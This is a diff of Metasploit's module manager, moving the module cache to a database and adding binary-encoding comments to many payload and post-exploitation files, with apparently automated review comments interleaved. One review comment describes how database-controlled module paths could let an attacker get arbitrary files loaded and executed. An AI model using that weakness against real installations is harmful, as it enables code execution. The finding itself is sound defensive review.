each_module_list(mod_ranked, opts, &block)
end
@@ -288,31 +286,14 @@ protected
self[name] = mod
end
- # Check to see if we should update info
- noup = true if (modinfo and modinfo['noup'])
-
- # Add this module to the module cache for this type
- framework.modules.cache_module(mod) if (noup != true)
-
- # Invalidate the sorted array
- invalidate_sorted_cache
-
- # Return the modlicated instance for use
mod
end
- #
- # Invalidates the sorted and ranked module caches.
- #
- def invalidate_sorted_cache
- mod_sorted = nil
- mod_ranked = nil
- end
-
attr_writer :module_type
attr_accessor :mod_arch_hash, :mod_platform_hash
attr_accessor :mod_sorted, :mod_ranked
attr_accessor :mod_extensions, :mod_ambiguous
+ attr_accessor :module_history
end
@@ -341,20 +322,17 @@ class ModuleManager < ModuleSet
#
def initialize(framework,types=MODULE_TYPES)
self.module_paths = []
- self.module_history = {}
- self.module_history_mtime = {}
self.module_sets = {}
self.module_failed = {}
self.enabled_types = {}
self.framework = framework
+ self.cache = {}
types.each { |type|
init_module_set(type)
}
super(nil)
-
- @modcache_invalidated = false
end
def init_module_set(type)
@@ -447,161 +425,6 @@ class ModuleManager < ModuleSet
return module_failed
end
- ##
- #
- # Module cache management to support demand loaded modules.
- #
- ##
-
- #
- # Sets the path that the module cache information is loaded from and
- # synchronized with. This method should be called prior to loading any
- # modules in order to take advantage of caching information.
- #
- def set_module_cache_file(file_path)
- @modcache_file = file_path
- @modcache = Rex::Parser::Ini.new
-
- begin
- @modcache.from_file(@modcache_file)
- rescue Errno::ENOENT
- @modcache_invalidated = true
- end
-
- # Initialize the standard groups
- @modcache.add_group('FileModificationTimes', false)
-
- MODULE_TYPES.each { |type|
- @modcache.add_group(type, false)
-
- @modcache[type].each_key { |name|
- next if not @modcache[type]
- next if not module_sets[type]
-
- fullname = type + '/' + name
-
- # Make sure the files associated with this module exist. If it
- # doesn't, then we don't create a symbolic module for it. This is
- # to ensure that module counts are accurately reflected after a
- # module is removed or moved.
- next if (@modcache.group?(fullname) == false)
- next if (@modcache[fullname]['FileNames'].nil?)
-
- begin
- @modcache[fullname]['FileNames'].split(',').each { |f|
- File::Stat.new(f)
- }
- rescue Errno::ENOENT
- dlog("File requirement does not exist for #{fullname}", 'core',
- LEV_1);
- next
- end
- module_sets[type][name] = SymbolicModule
- }
- }
-
- end
-
- #
- # Returns true if the module cache is currently being used.
- #
- def using_cache
- (@modcache_invalidated != true)
- end
-
- #
- # Persists the current contents of the module cache to disk.
- #
- def save_module_cache
- if (@modcache)
- @modcache.to_file(@modcache_file)
- end
- end
-
- #
- # Checks to make sure the cache state is okay. If it's not, the cache is
- # cleared and all modules are forced to be loaded. If the cached mtime for
- # the file is the same as the current mtime, then we don't load it until
- # it's needed on demand.
- #
- def check_cache(file)
- # If the module cache has been invalidated, then we return false to
- # indicate that we should go ahead and load the file now.
- return false if (@modcache_invalidated)
-
- if (@modcache and @modcache.group?('FileModificationTimes'))
- no_exist = false
-
- begin
- curr_mtime = File::Stat.new(file).mtime
- rescue Errno::ENOENT
- no_exist = true
- end
-
- if (no_exist or
- @modcache['FileModificationTimes'][file].nil? or
- @modcache['FileModificationTimes'][file].to_s != curr_mtime.to_i.to_s)
- raise ModuleCacheInvalidated, "File #{file} has a new mtime or did not exist"
- end
- end
-
- return true
- end
-
- #
- # Invalidates the current cache.
- #
- def invalidate_cache
- @modcache_invalidated = true
-
- # Clear the module cache.
- if (@modcache)
- @modcache['FileModificationTimes'].clear
-
- MODULE_TYPES.each { |type|
- @modcache[type].clear
- }
- end
- end
-
- #
- # Synchronizes the module cache information
- #
- def update_module_cache_info(fullname, mod, modinfo)
- return if (modinfo and modinfo['noup'] == true)
-
- if (@modcache)
- if (fullname)
- @modcache.add_group(fullname)
- @modcache[fullname].clear
- @modcache[fullname]['FileNames'] = modinfo['files'].join(',')
- @modcache[fullname]['FilePaths'] = modinfo['paths'].join(',')
- @modcache[fullname]['Type'] = modinfo['type']
-
-
- # Deep cache classes (ignore payloads)
- # if(mod.class == ::Class and mod.cached?)
- # @modcache[fullname]['CacheData'] = [Marshal.dump(mod.infos)].pack("m").gsub(/\s+/, '')
- # end
-
- end
-
- modinfo['files'].each do |f|
- begin
- @modcache['FileModificationTimes'][f] = File::Stat.new(f).mtime.to_i.to_s
- rescue Errno::ENOENT
- end
- end
- end
- end
-
- #
- # Caches this module under a specific module type and name
- #
- def cache_module(mod)
- @modcache[mod.type][mod.refname] = 1
- end
-
##
#
# Module path management
@@ -609,63 +432,46 @@ class ModuleManager < ModuleSet
##
#
- # Adds a path to be searched for new modules. If check_cache is false,
- # all modules in the specified path will be demand loaded. Furthermore,
- # their loading will not impact the module path.
+ # Adds a path to be searched for new modules.
#
- def add_module_path(path, check_cache = true)
- epaths = []
-
+ def add_module_path(path)
+ npaths = []
+
if path =~ /\.fastlib$/
unless ::File.exist?(path)
raise RuntimeError, "The path supplied does not exist", caller
end
+ npaths << ::File.expand_path(path)
else
path.sub!(/#{File::SEPARATOR}$/, '')
# Make the path completely canonical
path = Pathname.new(File.expand_path(path))
- # Make sure the path is a valid directory before we try to rock the
- # house
+ # Make sure the path is a valid directory
unless path.directory?
raise RuntimeError, "The path supplied is not a valid directory.", caller
end
# Now that we've confirmed it exists, get the full, cononical path
- path = path.realpath.to_s
+ path = ::File.expand_path(path)
+ npaths << path
# Identify any fastlib archives inside of this path
Dir["#{path}/**/*.fastlib"].each do |fp|
- epaths << fp
+ npaths << fp
end
end
- module_paths << path
-
- epaths.each do |epath|
- module_paths << epath
- end
-
- begin
- counts = load_modules(path, !check_cache)
- rescue ModuleCacheInvalidated
- invalidate_cache
-
- # Re-load all the modules now that the cache has been invalidated
- module_paths.each { |p|
- counts = load_modules(p, true)
- }
- end
-
- # Synchronize the module cache if the module cache is not being used.
- # We only do this if the caller wanted us to check the cache in the
- # first place. By default, check_cache will be true. One scenario
- # where it will be false is from the loadpath command in msfconsole.
- if !using_cache and check_cache
- save_module_cache
- end
-
+ # Update the module paths appropriately
+ self.module_paths = (module_paths + npaths).flatten.uniq
+
+ # Load all of the modules from the new paths
+ counts = nil
+ npaths.each { |d|
+ counts = load_modules(d, false)
+ }
+
return counts
end
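Review bot: `counts` is reassigned on every pass of the `npaths.each` loop, so when the directory contains `.fastlib` archives the method returns the counts of the last archive only, not of the path that was added. Accumulating keeps the return value meaningful: start with `counts = {}` and use `(load_modules(d, false) || {}).each { |t, c| counts[t] = (counts[t] || 0) + c }` inside the loop. The comment above the assignment still promises a canonical path, but `::File.expand_path` does not resolve symlinks the way the removed `realpath` did, so one directory reached through two names is stored and cached twice. Dropping the `check_cache` parameter will also break any caller that still passes two arguments; none are visible in this hunk.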
@@ -674,6 +480,7 @@ class ModuleManager < ModuleSet
#
def remove_module_path(path)
module_paths.delete(path)
+ module_paths.delete(::File.expand_path(path))
end
def register_type_extension(type, ext)
@@ -683,10 +490,8 @@ class ModuleManager < ModuleSet
# Reloads modules from all module paths
#
def reload_modules
- invalidate_cache
self.module_history = {}
- self.module_history_mtime = {}
self.clear
self.enabled_types.each_key do |type|
@@ -694,11 +499,17 @@ class ModuleManager < ModuleSet
init_module_set(type)
end
+ # The number of loaded modules in the following categories:
+ # auxiliary/encoder/exploit/nop/payload/post
+ count = 0
module_paths.each do |path|
- counts = load_modules(path, true)
+ mods = load_modules(path, true)
+ mods.each_value {|c| count += c}
end
- save_module_cache
+ rebuild_cache
+
+ count
end
#
@@ -765,10 +576,8 @@ class ModuleManager < ModuleSet
return nil
end
-
self.module_failed.delete(mod.file_path)
-
# Remove the original reference to this module
self.delete(mod.refname)
@@ -786,10 +595,12 @@ class ModuleManager < ModuleSet
end
# Let the specific module sets have an opportunity to handle the fact
- # that this module was reloaded. For instance, the payload module set
- # will need to flush the blob cache entry associated with this module
+ # that this module was reloaded.
module_sets[mod.type].on_module_reload(mod)
+ # Rebuild the cache for just this module
+ rebuild_cache(mod)
+
mod
end
@@ -802,12 +613,6 @@ class ModuleManager < ModuleSet
# Call the module set implementation of add_module
dup = super
- # If the module cache is not being used, update the cache with
- # information about the files that are associated with this module.
- if (!using_cache)
- update_module_cache_info(dup.fullname, mod, file_paths)
- end
-
# Automatically subscribe a wrapper around this module to the necessary
# event providers based on whatever events it wishes to receive. We
# only do this if we are the module manager instance, as individual
@@ -818,33 +623,6 @@ class ModuleManager < ModuleSet
framework.events.on_module_load(name, dup)
end
- #
- # Loads the files associated with a module and recalculates module
- # associations.
- #
- def demand_load_module(fullname)
- dlog("Demand loading module #{fullname}.", 'core', LEV_1)
-
- return nil if (@modcache.group?(fullname) == false)
- return nil if (@modcache[fullname]['FileNames'].nil?)
- return nil if (@modcache[fullname]['FilePaths'].nil?)
-
- type = fullname.split(/\//)[0]
- files = @modcache[fullname]['FileNames'].split(',')
- paths = @modcache[fullname]['FilePaths'].split(',')
-
- files.each_with_index { |file, idx|
- dlog("Loading from file #{file}", 'core', LEV_2)
-
- load_module_from_file(paths[idx], file, nil, nil, nil, true)
- }
-
- if (module_sets[type].postpone_recalc != true)
- module_sets[type].recalculate
- end
- end
-
-
#
# Provide a list of the types of modules in the set
#
@@ -866,6 +644,90 @@ class ModuleManager < ModuleSet
::File.read(file, ::File.size(file))
end
+ #
+ # Rebuild the cache for the module set
+ #
+ def rebuild_cache(mod = nil)
+ return if not (framework.db and framework.db.migrated)
+ if mod
+ framework.db.update_module_details(mod)
+ else
+ framework.db.update_all_module_details
+ end
+ refresh_cache
+ end
+
+ #
+ # Return a listing of all cached modules
+ #
+ def cache_entries
+ return {} if not (framework.db and framework.db.migrated)
+ res = {}
+ ::Mdm::ModuleDetail.find(:all).each do |m|
+ res[m.file] = { :mtype => m.mtype, :refname => m.refname, :file => m.file, :mtime => m.mtime }
+ unless module_set(m.mtype).has_key?(m.refname)
+ module_set(m.mtype)[m.refname] = SymbolicModule
+ end
+ end
+
+ res
+ end
+
+ #
+ # Reset the module cache
+ #
+ def refresh_cache
+ self.cache = cache_entries
+ end
+
+ def has_module_file_changed?(file)
+ begin
+ cfile = self.cache[file]
+ return true if not cfile
+
+ # Payloads can't be cached due to stage/stager matching
+ return true if cfile[:mtype] == "payload"
+ return cfile[:mtime].to_i != ::File.mtime(file).to_i
+ rescue ::Errno::ENOENT
+ return true
+ end
+ end
+
+ def has_archive_file_changed?(arch, file)
+ begin
+ cfile = self.cache[file]
+ return true if not cfile
+
+ # Payloads can't be cached due to stage/stager matching
+ return true if cfile[:mtype] == "payload"
+
+ return cfile[:mtime].to_i != ::File.mtime(file).to_i
+ rescue ::Errno::ENOENT
+ return true
+ end
+ end
+
+ def demand_load_module(mtype, mname)
+ n = self.cache.keys.select { |k|
+ self.cache[k][:mtype] == mtype and
+ self.cache[k][:refname] == mname
+ }.first
+
+ return nil unless n
+ m = self.cache[n]
+
+ path = nil
+ if m[:file] =~ /^(.*)\/#{m[:mtype]}s?\//
+ path = $1
+ load_module_from_file(path, m[:file], nil, nil, nil, true)
+ else
+ dlog("Could not demand load module #{mtype}/#{mname} (unknown base name in #{m[:file]})", 'core', LEV_2)
+ nil
+ end
+ end
+
+ attr_accessor :cache # :nodoc:
+
protected
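Review bot: `demand_load_module` takes the file to load straight from the `Mdm::ModuleDetail` rows collected in `cache_entries` and passes `demand = true`, so the path is checked neither against the configured `module_paths` nor against the mtime test. Anyone able to write to that table can point a module name at an arbitrary file; assuming `load_module_from_file` evaluates the file (its body is outside this hunk), that is code execution in the framework process. Before loading, confirm that the derived base is a registered path, e.g. `return nil unless module_paths.include?(path)`, and log the rejection. The pattern `/^(.*)\/#{m[:mtype]}s?\//` also interpolates a database value unescaped and anchors with `^`; `Regexp.escape(m[:mtype])` and `\A` would be safer.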
@@ -910,17 +772,15 @@ protected
next if (file =~ /rb\.(ut|ts)\.rb$/)
# Skip files with a leading period
- next if file[0,1] =="."
+ next if file[0,1] == "."
load_module_from_file(bpath, file, loaded, recalc, counts, demand)
end
end
- # Perform any required recalculations for the individual module types
- # that actually had load changes
- recalc.each_key { |key|
- module_sets[key].recalculate
- }
+ recalc.each_key do |mtype|
+ module_set(mtype).recalculate
+ end
# Return per-module loaded counts
return counts
@@ -954,16 +814,14 @@ protected
next if (ent =~ /rb\.(ut|ts)\.rb$/)
# Skip files with a leading period
- next if ent[0,1] =="."
+ next if ent[0,1] == "."
load_module_from_archive(bpath, ent, loaded, recalc, counts, demand)
end
- # Perform any required recalculations for the individual module types
- # that actually had load changes
- recalc.each_key { |key|
- module_sets[key].recalculate
- }
+ recalc.each_key do |mtype|
+ module_set(mtype).recalculate
+ end
# Return per-module loaded counts
return counts
@@ -974,10 +832,7 @@ protected
#
def load_module_from_file(path, file, loaded, recalc, counts, demand = false)
-
- # If the file on disk hasn't changed with what we have stored in the
- # cache, then there's no sense in loading it
- if (!has_module_file_changed?(file))
+ if not ( demand or has_module_file_changed?(file))
dlog("Cached module from file #{file} has not changed.", 'core', LEV_2)
return false
end
@@ -1061,12 +916,6 @@ protected
elog("Exception caught during is_usable check: #{$!}")
end
- # Synchronize the modification time for this file.
- update_module_cache_info(nil, added, {
- 'paths' => [ path ],
- 'files' => [ file ],
- 'type' => type}) if (!using_cache)
-
if (usable == false)
ilog("Skipping module in #{file} because is_usable returned false.", 'core', LEV_1)
return false
@@ -1088,10 +937,6 @@ protected
# Append the added module to the hash of file->module
loaded[file] = added if (loaded)
- # Track module load history for future reference
- module_history[file] = added
- module_history_mtime[file] = File::Stat.new(file).mtime.to_i
-
# The number of loaded modules this round
if (counts)
counts[type] = (counts[type]) ? (counts[type] + 1) : 1
@@ -1105,6 +950,11 @@ protected
# Loads a module from the supplied archive path
#
def load_module_from_archive(path, file, loaded, recalc, counts, demand = false)
+
+ if not ( demand or has_archive_module_file_changed?(file))
+ dlog("Cached module from file #{file} has not changed.", 'core', LEV_2)
+ return false
+ end
# Derive the name from the path with the exclusion of the .rb
name = file.match(/^(.+?)#{File::SEPARATOR}(.*)(.rb?)$/)[2]
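Review bot: The new guard calls `has_archive_module_file_changed?(file)`, but the helper this commit adds to ModuleManager is `has_archive_file_changed?(arch, file)`, with a different name and two parameters. Unless another definition exists outside the visible hunks, every non-demand archive load raises NoMethodError here; the call should read `if not (demand or has_archive_file_changed?(path, file))`. The helper also runs `::File.mtime(file)` on what is an entry name inside the archive, which will normally hit the ENOENT rescue and report "changed", so archive entries would never be served from the cache. Comparing against the mtime of the archive itself (`arch`, currently unused) looks like the intent. The method body continues outside this hunk.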
@@ -1181,12 +1031,6 @@ protected
elog("Exception caught during is_usable check: #{$!}")
end
- # Synchronize the modification time for this file.
- update_module_cache_info(nil, added, {
- 'paths' => [ path ],
- 'files' => [ file ],
- 'type' => type}) if (!using_cache)
-
if (usable == false)
ilog("Skipping module in #{path}::#{file} because is_usable returned false.", 'core', LEV_1)
return false
@@ -1208,10 +1052,6 @@ protected
# Append the added module to the hash of file->module
loaded[file] = added if (loaded)
- # Track module load history for future reference
- module_history[file] = added
- module_history_mtime[file] = ::Time.now.to_i
-
# The number of loaded modules this round
if (counts)
counts[type] = (counts[type]) ? (counts[type] + 1) : 1
@@ -1220,17 +1060,6 @@ protected
return true
end
- #
- # Checks to see if the supplied file has changed (if it's even in the
- # cache).
- #
- def has_module_file_changed?(file)
- begin
- return (module_history_mtime[file] != File::Stat.new(file).mtime.to_i)
- rescue Errno::ENOENT
- return true
- end
- end
#
# Called when a module is initially loaded such that it can be
@@ -1244,7 +1073,7 @@ protected
# off to a special payload set. The payload set, in turn, will
# automatically create all the permutations after all the payload
# modules have been loaded.
-
+
if (type != MODULE_PAYLOAD)
# Add the module class to the list of modules and add it to the
# type separated set of module classes
@@ -1289,7 +1118,6 @@ protected
attr_accessor :modules, :module_sets # :nodoc:
attr_accessor :module_paths # :nodoc:
- attr_accessor :module_history, :module_history_mtime # :nodoc:
attr_accessor :module_failed # :nodoc:
attr_accessor :enabled_types # :nodoc:
diff --git a/lib/msf/core/nop.rb b/lib/msf/core/nop.rb
index 40836b2511..b2d98b3880 100644
--- a/lib/msf/core/nop.rb
+++ b/lib/msf/core/nop.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/option_container.rb b/lib/msf/core/option_container.rb
index 0c0bb9ba5a..f3c9e61051 100644
--- a/lib/msf/core/option_container.rb
+++ b/lib/msf/core/option_container.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'resolv'
require 'msf/core'
require 'rex/socket'
diff --git a/lib/msf/core/option_container.rb.ut.rb b/lib/msf/core/option_container.rb.ut.rb
index 641c8ef837..f146b94cc7 100644
--- a/lib/msf/core/option_container.rb.ut.rb
+++ b/lib/msf/core/option_container.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/msf/core/patches/active_record.rb b/lib/msf/core/patches/active_record.rb
index d02e2cf3b8..6e8fa74070 100644
--- a/lib/msf/core/patches/active_record.rb
+++ b/lib/msf/core/patches/active_record.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module ActiveRecord
module ConnectionAdapters
class ConnectionPool
diff --git a/lib/msf/core/payload.rb b/lib/msf/core/payload.rb
index 0d24ba271f..b4154b0717 100644
--- a/lib/msf/core/payload.rb
+++ b/lib/msf/core/payload.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
require 'metasm'
diff --git a/lib/msf/core/payload/aix.rb b/lib/msf/core/payload/aix.rb
index d1eb3fffe7..cc45084a24 100644
--- a/lib/msf/core/payload/aix.rb
+++ b/lib/msf/core/payload/aix.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
###
diff --git a/lib/msf/core/payload/bsd.rb b/lib/msf/core/payload/bsd.rb
index 4686eb8f00..a3c930c0a2 100644
--- a/lib/msf/core/payload/bsd.rb
+++ b/lib/msf/core/payload/bsd.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
###
diff --git a/lib/msf/core/payload/generic.rb b/lib/msf/core/payload/generic.rb
index 378e6ec8bb..c72cf13bf0 100644
--- a/lib/msf/core/payload/generic.rb
+++ b/lib/msf/core/payload/generic.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/payload/java.rb b/lib/msf/core/payload/java.rb
index d3555f41ff..37e563e6ee 100644
--- a/lib/msf/core/payload/java.rb
+++ b/lib/msf/core/payload/java.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf::Payload::Java
diff --git a/lib/msf/core/payload/linux.rb b/lib/msf/core/payload/linux.rb
index 26e7a1252a..8d1dc9805c 100644
--- a/lib/msf/core/payload/linux.rb
+++ b/lib/msf/core/payload/linux.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
###
diff --git a/lib/msf/core/payload/netware.rb b/lib/msf/core/payload/netware.rb
index 7e65c72956..f1bbe99a36 100644
--- a/lib/msf/core/payload/netware.rb
+++ b/lib/msf/core/payload/netware.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
###
diff --git a/lib/msf/core/payload/osx.rb b/lib/msf/core/payload/osx.rb
index 915ab64fa0..dc9f89c0f9 100644
--- a/lib/msf/core/payload/osx.rb
+++ b/lib/msf/core/payload/osx.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
###
diff --git a/lib/msf/core/payload/osx/bundleinject.rb b/lib/msf/core/payload/osx/bundleinject.rb
index ed227313a3..d327374ea3 100644
--- a/lib/msf/core/payload/osx/bundleinject.rb
+++ b/lib/msf/core/payload/osx/bundleinject.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/payload/php.rb b/lib/msf/core/payload/php.rb
index ab9721f295..e843416fe0 100644
--- a/lib/msf/core/payload/php.rb
+++ b/lib/msf/core/payload/php.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
###
diff --git a/lib/msf/core/payload/single.rb b/lib/msf/core/payload/single.rb
index 4ecbd66be4..7a78b489bc 100644
--- a/lib/msf/core/payload/single.rb
+++ b/lib/msf/core/payload/single.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
###
diff --git a/lib/msf/core/payload/solaris.rb b/lib/msf/core/payload/solaris.rb
index 2f43a68481..909d0217e9 100644
--- a/lib/msf/core/payload/solaris.rb
+++ b/lib/msf/core/payload/solaris.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
###
diff --git a/lib/msf/core/payload/stager.rb b/lib/msf/core/payload/stager.rb
index e0e951103c..45674bc0f1 100644
--- a/lib/msf/core/payload/stager.rb
+++ b/lib/msf/core/payload/stager.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
###
diff --git a/lib/msf/core/payload/windows.rb b/lib/msf/core/payload/windows.rb
index 7ca61ba62f..64f5914f02 100644
--- a/lib/msf/core/payload/windows.rb
+++ b/lib/msf/core/payload/windows.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
###
diff --git a/lib/msf/core/payload/windows/dllinject.rb b/lib/msf/core/payload/windows/dllinject.rb
index f98bbc2aa3..99d193adf4 100644
--- a/lib/msf/core/payload/windows/dllinject.rb
+++ b/lib/msf/core/payload/windows/dllinject.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/payload/windows/exec.rb b/lib/msf/core/payload/windows/exec.rb
index ff38b50fb5..5ad8a42568 100644
--- a/lib/msf/core/payload/windows/exec.rb
+++ b/lib/msf/core/payload/windows/exec.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/payload/windows/loadlibrary.rb b/lib/msf/core/payload/windows/loadlibrary.rb
index e077716b61..05854d12df 100644
--- a/lib/msf/core/payload/windows/loadlibrary.rb
+++ b/lib/msf/core/payload/windows/loadlibrary.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/payload/windows/reflectivedllinject.rb b/lib/msf/core/payload/windows/reflectivedllinject.rb
index 703d311880..c0e2db1950 100644
--- a/lib/msf/core/payload/windows/reflectivedllinject.rb
+++ b/lib/msf/core/payload/windows/reflectivedllinject.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
require 'rex/peparsey'
diff --git a/lib/msf/core/payload/windows/x64/reflectivedllinject.rb b/lib/msf/core/payload/windows/x64/reflectivedllinject.rb
index 04318e15cc..3e37820d7d 100644
--- a/lib/msf/core/payload/windows/x64/reflectivedllinject.rb
+++ b/lib/msf/core/payload/windows/x64/reflectivedllinject.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
require 'rex/peparsey'
diff --git a/lib/msf/core/payload_set.rb b/lib/msf/core/payload_set.rb
index 9e72f6da70..c31a3f94a8 100644
--- a/lib/msf/core/payload_set.rb
+++ b/lib/msf/core/payload_set.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/module_manager'
@@ -179,8 +180,10 @@ class PayloadSet < ModuleSet
# which it is, we add it to the appropriate list.
#
def add_module(pmodule, name, modinfo = nil)
+
if (md = name.match(/^(singles|stagers|stages)#{File::SEPARATOR}(.*)$/))
- name = md[2]
+ ptype = md[1]
+ name = md[2]
end
# Duplicate the Payload base class and extend it with the module
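Review bot: `ptype = md[1]` is assigned in `add_module` but nothing in this hunk reads it, and it is only set when the name matches, so it is nil for a name without a `singles`/`stagers`/`stages` prefix. The rest of `add_module` lies outside the hunk, so a use may exist there; if it does, a comment such as `# ptype stays nil when name has no type prefix` would tell the reader that the nil case is expected. If nothing reads it, the assignment should be dropped. The blank line added directly after the `def` line is stray.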
diff --git a/lib/msf/core/plugin.rb b/lib/msf/core/plugin.rb
index f63e75acad..1afe44a62f 100644
--- a/lib/msf/core/plugin.rb
+++ b/lib/msf/core/plugin.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/sync/ref'
module Msf
diff --git a/lib/msf/core/plugin_manager.rb b/lib/msf/core/plugin_manager.rb
index 1e3362b4b1..bae9aabb9e 100644
--- a/lib/msf/core/plugin_manager.rb
+++ b/lib/msf/core/plugin_manager.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/plugin'
module Msf
diff --git a/lib/msf/core/post.rb b/lib/msf/core/post.rb
index 774c11f2b6..af2eadb9f7 100644
--- a/lib/msf/core/post.rb
+++ b/lib/msf/core/post.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/module'
diff --git a/lib/msf/core/post/common.rb b/lib/msf/core/post/common.rb
index d7ea9635de..7e5861bb32 100644
--- a/lib/msf/core/post/common.rb
+++ b/lib/msf/core/post/common.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
class Post
diff --git a/lib/msf/core/post/file.rb b/lib/msf/core/post/file.rb
index aaad99965c..558c7d42b8 100644
--- a/lib/msf/core/post/file.rb
+++ b/lib/msf/core/post/file.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
class Post
diff --git a/lib/msf/core/post/linux/priv.rb b/lib/msf/core/post/linux/priv.rb
index 16f0e41dec..78f9c04015 100644
--- a/lib/msf/core/post/linux/priv.rb
+++ b/lib/msf/core/post/linux/priv.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/post/common'
module Msf
diff --git a/lib/msf/core/post/linux/system.rb b/lib/msf/core/post/linux/system.rb
index 33ff68109b..b1f267e718 100644
--- a/lib/msf/core/post/linux/system.rb
+++ b/lib/msf/core/post/linux/system.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/unix'
diff --git a/lib/msf/core/post/osx/system.rb b/lib/msf/core/post/osx/system.rb
index 912b752939..5d96a8a5ec 100644
--- a/lib/msf/core/post/osx/system.rb
+++ b/lib/msf/core/post/osx/system.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/post/common'
require 'msf/core/post/file'
diff --git a/lib/msf/core/post/solaris/priv.rb b/lib/msf/core/post/solaris/priv.rb
index 23d8711c56..80ceaee439 100644
--- a/lib/msf/core/post/solaris/priv.rb
+++ b/lib/msf/core/post/solaris/priv.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/post/common'
module Msf
diff --git a/lib/msf/core/post/solaris/system.rb b/lib/msf/core/post/solaris/system.rb
index c88c25a50b..7cae267453 100644
--- a/lib/msf/core/post/solaris/system.rb
+++ b/lib/msf/core/post/solaris/system.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/unix'
diff --git a/lib/msf/core/post/unix.rb b/lib/msf/core/post/unix.rb
index 707e464c56..73d8fd69ca 100644
--- a/lib/msf/core/post/unix.rb
+++ b/lib/msf/core/post/unix.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
class Post
diff --git a/lib/msf/core/post/windows/accounts.rb b/lib/msf/core/post/windows/accounts.rb
index 672e656b7c..d035156721 100644
--- a/lib/msf/core/post/windows/accounts.rb
+++ b/lib/msf/core/post/windows/accounts.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
class Post
module Windows
diff --git a/lib/msf/core/post/windows/cli_parse.rb b/lib/msf/core/post/windows/cli_parse.rb
index 9bcc4c424c..2a52356c5d 100644
--- a/lib/msf/core/post/windows/cli_parse.rb
+++ b/lib/msf/core/post/windows/cli_parse.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
class Post
diff --git a/lib/msf/core/post/windows/eventlog.rb b/lib/msf/core/post/windows/eventlog.rb
index 88d81d8690..c21fa270e3 100644
--- a/lib/msf/core/post/windows/eventlog.rb
+++ b/lib/msf/core/post/windows/eventlog.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
class Post
module Windows
diff --git a/lib/msf/core/post/windows/powershell.rb b/lib/msf/core/post/windows/powershell.rb
index 81eac17dc6..2e08d549e9 100644
--- a/lib/msf/core/post/windows/powershell.rb
+++ b/lib/msf/core/post/windows/powershell.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'zlib'
require 'msf/core/post/common'
diff --git a/lib/msf/core/post/windows/priv.rb b/lib/msf/core/post/windows/priv.rb
index 29e92918d5..3667d7058e 100644
--- a/lib/msf/core/post/windows/priv.rb
+++ b/lib/msf/core/post/windows/priv.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/post/windows/accounts'
diff --git a/lib/msf/core/post/windows/railgun.rb b/lib/msf/core/post/windows/railgun.rb
index ba97d832ae..72b12f179f 100644
--- a/lib/msf/core/post/windows/railgun.rb
+++ b/lib/msf/core/post/windows/railgun.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/stdapi/railgun/railgun'
module Msf
diff --git a/lib/msf/core/post/windows/registry.rb b/lib/msf/core/post/windows/registry.rb
index 38ac73cfec..957c165ee0 100644
--- a/lib/msf/core/post/windows/registry.rb
+++ b/lib/msf/core/post/windows/registry.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/post/windows/cli_parse'
diff --git a/lib/msf/core/post/windows/registry.rb.ut.rb b/lib/msf/core/post/windows/registry.rb.ut.rb
